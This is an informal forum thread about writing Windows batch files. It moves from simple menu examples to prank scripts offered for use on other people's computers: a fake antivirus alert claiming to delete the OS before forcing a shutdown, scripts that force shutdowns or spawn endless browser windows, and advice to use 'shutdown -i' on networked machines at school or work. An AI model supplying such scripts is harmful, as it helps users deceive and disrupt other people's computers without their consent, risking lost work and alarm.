it is fun to create .bat files though to make .bat files open notepad type something like
@echo off COLOR 01 echo test pause
go to save as, click all files instead of text document (.txt) and name it test.bat open the .bat version and see
i'm guessing COLOR can go from 00-99
you can put all sorts of commands in 1 code is
goto after goto put anyname you want [/i]Itunes then make an Itunes option by putting [i]:Itunes put the rest of command here or a path to a file "C:/Program Files/iTunes/iTunes.exe" you muuust have quotes in paths altogether it looks like
some other commands for reg command prompt: tracert (insert website) tree mspaint notepad del net user msconfig pinball telnet (if you have XP)
others you can just type help
i created one open notepad and save this as a .bat file
@echo off :menu COLOR 00 title Internet Explorationing
echo Want to go on the Internet? set /p option=yes/no? if %option%==yes goto Ie if %option%==no goto neva if %option%==Yes goto Ie if %option%==No goto neva if %option%==* goto error goto error :Ie "C:\\Program Files\\Internet Explorer\\iexplore.exe" pause :neva shutdown -s -t 5 -c "Say no to me eh?!" :error echo What you tryin to do?
"shutdown -i" is useful if you know the computer names. It basically shuts down a computer within the network without actually going to Start menu. You can also mess with it at school/work, although you might get in trouble.
i've shared this before on forums, so i guess i'll share it here too.
a fake virus to freak out your technologically inept friends. just change it to your (C name and Antivirus.
@echo off echo ESET NOD32 Antivirus 4 has detected a threat to SYSTEM. pause echo Attempting to clean infected files. pause echo Deleting OS (C. pause shutdown -s -t 10 -c "Windows has encountered an error. Please contact your system Administrator for further details." :hack echo file:2323#@$ echo file:32433$$%% echo file:#$@#$!53 echo file:#$35323 echo file:24@#$%2 goto hack
i like doing this on someone elses computer u give them a program it has a msg click ok it pops another sayin click ok again (if u click x it spawns another thing) once u hit ok twice it pops up 10 seconds to put in secret code before shut down (the command for shut down is like shutdown -f -s (-f fource - s no save)
@echo off START http://www.smouch.net/lol start http://www.smouch.net/lol
Don't click those, you'll get rick-rolled. However, if you keep repeating the Start http://www.smouch.net/lol the computer will be filled up with rick-rolling pages that move around and shake and are generally near impossible to get rid of.